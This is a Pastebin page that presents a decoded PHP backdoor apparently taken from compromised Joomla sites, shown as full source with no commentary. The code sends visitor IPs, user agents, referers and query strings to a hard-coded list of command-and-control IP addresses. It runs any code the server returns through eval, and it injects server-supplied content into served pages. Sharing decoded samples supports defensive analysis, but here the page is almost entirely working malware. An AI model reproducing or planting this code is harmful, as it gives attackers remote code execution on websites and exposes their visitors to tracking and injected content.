API tools faq
paste
kerryadams

Joomla hackies backdoor decoded

kerryadams
May 28th, 2012
70
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.85 KB | None | 0 0
raw download clone embed print report
  1. <?php if (!function_exists ("GetMama"))
  2.   {
  3.     function mod_con ($buf)
  4.     {
  5.       str_ireplace ("<body>", "<body>", $buf, $cnt_h);
  6.       if ($cnt_h == 1)
  7.     {
  8.       $buf =
  9.         str_ireplace ("<body>", "<body>".stripslashes ($_SERVER["good"]),
  10.               $buf);
  11.       return $buf;
  12.     }
  13.       str_ireplace ("</body>", "</body>", $buf, $cnt_h);
  14.       if ($cnt_h == 1)
  15.     {
  16.       $buf =
  17.         str_ireplace ("</body>",
  18.               stripslashes ($_SERVER["good"])."</body>", $buf);
  19.       return $buf;
  20.     }
  21.       return $buf;
  22.     }
  23.     function opanki ($buf)
  24.     {
  25.       $gz_e = false;
  26.       $h_l = headers_list ();
  27.       if (in_array ("Content-Encoding: gzip", $h_l))
  28.     {
  29.       $gz_e = true;
  30.     }
  31.       if ($gz_e)
  32.     {
  33.       $tmpfname = tempnam ("/tmp", "FOO");
  34.       file_put_contents ($tmpfname, $buf);
  35.       $zd = gzopen ($tmpfname, "r");
  36.       $contents = gzread ($zd, 10000000);
  37.       $contents = mod_con ($contents);
  38.       gzclose ($zd);
  39.       unlink ($tmpfname);
  40.       $contents = gzencode ($contents);
  41.     }
  42.       else
  43.     {
  44.       $contents = mod_con ($buf);
  45.     }
  46.       $len = strlen ($contents);
  47.       header ("Content-Length: ".$len);
  48.       return ($contents);
  49.     }
  50.     function GetMama ()
  51.     {
  52.       $mother = "haplessvictim.ord";
  53.       return $mother;
  54.     }
  55.     ob_start ("opanki");
  56.     function ahfudflfzdhfhs ($pa)
  57.     {
  58.       $mama = GetMama ();
  59.       $file = urlencode (__FILE__);
  60.       if (isset ($_SERVER["HTTP_HOST"]))
  61.     {
  62.       $host = $_SERVER["HTTP_HOST"];
  63.     }
  64.       else
  65.     {
  66.       $host = "";
  67.     }
  68.       if (isset ($_SERVER["REMOTE_ADDR"]))
  69.     {
  70.       $ip = $_SERVER["REMOTE_ADDR"];
  71.     }
  72.       else
  73.     {
  74.       $ip = "";
  75.     }
  76.       if (isset ($_SERVER["HTTP_REFERER"]))
  77.     {
  78.       $ref = urlencode ($_SERVER["HTTP_REFERER"]);
  79.     }
  80.       else
  81.     {
  82.       $ref = "";
  83.     }
  84.       if (isset ($_SERVER["HTTP_USER_AGENT"]))
  85.     {
  86.       $ua = urlencode (strtolower ($_SERVER["HTTP_USER_AGENT"]));
  87.     }
  88.       else
  89.     {
  90.       $ua = "";
  91.     }
  92.       if (isset ($_SERVER["QUERY_STRING"]))
  93.     {
  94.       $qs = urlencode ($_SERVER["QUERY_STRING"]);
  95.     }
  96.       else
  97.     {
  98.       $qs = "";
  99.     }
  100.       $url_0 = "http://".$pa;
  101.       $url_1 =
  102.     "/jedi.php?version=0991&mother=".$mama."&file=".$file."&host=".$host.
  103.     "&ip=".$ip."&ref=".$ref."&ua=".$ua."&qs=".$qs;
  104.       $try = true;
  105.       if (function_exists ("curl_init"))
  106.     {
  107.       $ch = curl_init ($url_0.$url_1);
  108.       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  109.       curl_setopt ($ch, CURLOPT_TIMEOUT, 3);
  110.       $ult = trim (curl_exec ($ch));
  111.       $try = false;
  112.     }
  113.       if ((ini_get ("allow_url_fopen")) && $try)
  114.     {
  115.       $ult = trim (@file_get_contents ($url_0.$url_1));
  116.       $try = false;
  117.     }
  118.       if ($try)
  119.     {
  120.       $fp = fsockopen ($pa, 80, $errno, $errstr, 30);
  121.       if ($fp)
  122.         {
  123.           $out = "GET $url_1 HTTP/1.0\r\n";
  124.           $out. = "Host: $pa\r\n";
  125.           $out. = "Connection: Close\r\n\r\n";
  126.           fwrite ($fp, $out);
  127.           $ret = "";
  128.           while (!feof ($fp))
  129.         {
  130.           $ret. = fgets ($fp, 128);
  131.         }
  132.           fclose ($fp);
  133.           $ult = trim (substr ($ret, strpos ($ret, "\r\n\r\n") + 4));
  134.         }
  135.     }
  136.       if (strpos ($ult, "eval") !== false)
  137.     {
  138.       $z = stripslashes (str_replace ("eval", "", $ult));
  139.       eval ($z);
  140.       exit ();
  141.     }
  142.       if (strpos ($ult, "ebna") !== false)
  143.     {
  144.       $_SERVER["good"] = str_replace ("ebna", "", $ult);
  145.       return true;
  146.     }
  147.       else
  148.     {
  149.       return false;
  150.     }
  151.     }
  152.     $father2[] = "78.46.173.14";
  153.     $father2[] = "176.9.218.191";
  154.     $father2[] = "91.228.154.254";
  155.     $father2[] = "77.81.241.253";
  156.     $father2[] = "184.82.117.110";
  157.     $father2[] = "46.4.202.93";
  158.     $father2[] = "46.249.58.135";
  159.     $father2[] = "176.9.241.150";
  160.     $father2[] = "46.37.169.56";
  161.     $father2[] = "46.30.41.99";
  162.     $father2[] = "94.242.255.35";
  163.     $father2[] = "178.162.129.223";
  164.     $father2[] = "78.47.184.33";
  165.     $father2[] = "31.184.234.96";
  166.     shuffle ($father2);
  167.     foreach ($father2 as $ur)
  168.     {
  169.       if (ahfudflfzdhfhs ($ur))
  170.     {
  171.       break;
  172.     }
  173.     }
  174.   }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!